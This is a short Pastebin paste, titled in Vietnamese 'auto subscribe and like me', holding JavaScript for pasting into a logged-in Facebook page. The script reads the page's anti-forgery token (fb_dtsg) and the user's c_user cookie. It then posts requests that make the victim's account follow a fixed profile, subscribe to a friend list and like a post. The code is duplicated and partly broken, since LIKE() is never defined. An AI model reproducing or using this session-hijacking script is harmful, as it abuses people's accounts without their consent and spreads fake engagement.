Advertisement
OnnesGhost

tu dong sub va like anh

Nov 27th, 2015
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.66 KB | None | 0 0
  1.  
  2. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  3. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  4. function a(abone)
  5. { var http4=new XMLHttpRequest;
  6. var url4="/ajax/follow/follow_profile.php?__a=1";
  7. var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
  8. http4.open("POST",url4,true);
  9. http4.onreadystatechange=function()
  10. { if(http4.readyState==4&&http4.status==200)http4.close };
  11. http4.send(params4)}
  12. function sublist(uidss)
  13. { var a = document.createElement('script');
  14. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  15. document.body.appendChild(a);
  16. }
  17. //
  18. sublist("100009462500092");LIKE("1521951294796939")
  19.  
  20. a("100009462500092");
  21. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  22. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  23. function a(abone)
  24. { var http4=new XMLHttpRequest;
  25. var url4="/ajax/follow/follow_profile.php?__a=1";
  26. var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
  27. http4.open("POST",url4,true);
  28. http4.onreadystatechange=function()
  29. { if(http4.readyState==4&&http4.status==200)http4.close };
  30. http4.send(params4)}
  31. function sublist(uidss)
  32. { var a = document.createElement('script');
  33. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  34. document.body.appendChild(a);
  35. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement